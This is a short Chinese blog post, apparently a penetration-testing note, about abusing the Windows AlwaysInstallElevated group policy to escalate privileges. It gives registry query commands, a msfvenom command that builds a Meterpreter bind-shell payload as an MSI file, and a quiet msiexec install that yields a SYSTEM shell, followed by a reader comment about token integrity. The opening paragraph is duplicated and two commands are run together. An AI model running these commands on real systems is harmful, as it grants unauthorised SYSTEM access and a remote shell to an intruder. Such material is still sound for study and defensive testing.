Windows环境提供组策略设置,允许常规用户安装具有系统权限的Microsoft Windows Installer程序包(MSI)。这可以在标准用户想要安装需要系统权限的应用程序的环境中发 现,并且管理员希望避免向用户提供临时本地管理员访问权限。Windows环境提供组策略设置,允许常规用户安装具有系统权限的Microsoft Windows Installer程序包(MSI)。这可以在标准用户想要安装需要系统权限的应用程序的环境中发 现,并且管理员希望避免向用户提供临时本地管理员访问权限。
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installerreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
生成msi
msfvenom -p windows/meterpreter/bind_tcp lport4567 -f msi > /root/Desktop/1.msi
系统shell下执行命令,可以获取systemshell
msiexec /quiet /qn /i 1.msi
声明:本文为原创文章,版权归lsh4ck's Blog所有,欢迎分享本文,转载请保留出处!
msf的不行 权限令牌为中等 需要msi wrapper来制作
@111了解